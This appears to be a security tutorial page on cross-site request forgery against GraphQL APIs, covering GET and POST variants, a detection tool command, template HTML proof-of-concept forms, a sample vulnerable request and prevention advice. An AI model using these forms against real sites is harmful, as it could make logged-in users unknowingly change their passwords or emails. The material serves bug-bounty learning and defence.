linkedinGithub

😋CSRF

Csrf [Cross-Site Request Forgery] is a vulnerability which occur when malicious web application cause a web browser to do unwanted task on behalf of authenticated user. In other words we can say that by exploiting crsf attacker can force the authenticated user to do unwanted/not_intended task.

Unwanted tasks like :

  1. updating users password

  2. updating users email

Csrf attacks happens generally when authentication is based on cookie not on any other header.

LogoWhat is CSRF (Cross-site request forgery)? Tutorial & Examples | Web Security AcademyWebSecAcademy
try portswigger's labs for more on csrf

Csrf In Graphql

Csrf in graphql have same concept where users are forced to do unwanted task that they don't intend to do.

let's categorize the csrf for better understanding

  1. GET based csrf

  2. POST based csrf

1. GET based Csrf 😄

Let's understand whole process with steps:

  • As graphql allows query and mutation operation through GET request.

  • it can be abuse if web application is using cookie based authentication.

  • Then attacker can craft a payload such that it will change the user's detail.

  • At last send the crafted payload to the authenticated user.

Detect if target is vulnerable to GET based by using : stainql

This tool will not always give correct answer so do check manually. [as it is in building stage]

Command for checking both type of csrf :

python3 graphql.py -t https://graphql-example.com/graphql -c
LogoGitHub - sumeet-darekar/stainql: Automating boring parts of graphql testingGitHub
tool for detecting csrf

For manually checking for Get based Csrf refer this article by assetnote:

LogoExploiting GraphQLwww.assetnote.io
assetnote

POC code for GET based csrf : 

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://graphql-example.com/graphql">
      <input type="hidden" name="query" value="<value of query>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Bug Report on GET based CSRF :

LogoGitLab disclosed on HackerOne: CSRF on /api/graphql allows...HackerOne
hackerone
Logohuntr - The world’s first bug bounty platform for AI/MLhuntr.com
huntr_ai
LogoCSRF on /api/graphql allows executing mutations through GET requests (#324397) · Issues · GitLab.org / GitLab · GitLabGitLab
Gitlab

2. POST based CSRF 😄

Again the concept is same but POST based csrf are found more often then GET based.

Detecting post based csrf :

If server is accepting x-www-form-urlencoded as content-type then it can be vulnearble to POST based csrf. If server is only accepting the application/json format then it is invulnerable to csrf because application/json has several security features.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://graphql-example/graphql" method="POST">
      <input type="hidden" name="query" value="<html encoded value of query parameter>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Example of vulnerable request:

Host: graphql-example.com
Connection: close
Content-Length: 100
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Referer: https://graphql-example.com
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: ...

query=query+%7B+dummyQuery+%7D

Vulnerable response

{
"errors":
[{"message":"Cannot query field \"dummyQuery\" on type \"Query\"."
,"locations":[{"line":1,"column":9
}]}]}

Prvention Of Csrf Vulnerability

  • Only use application/json in POST based request, don't allow any other content type.

  • Use secure token exchange.

LogoCross-Site Request Forgery (CSRF) PreventionApollo GraphQL Docs
more about prevention.
PreviousBatching AttacksNextInformation Disclosure

Last updated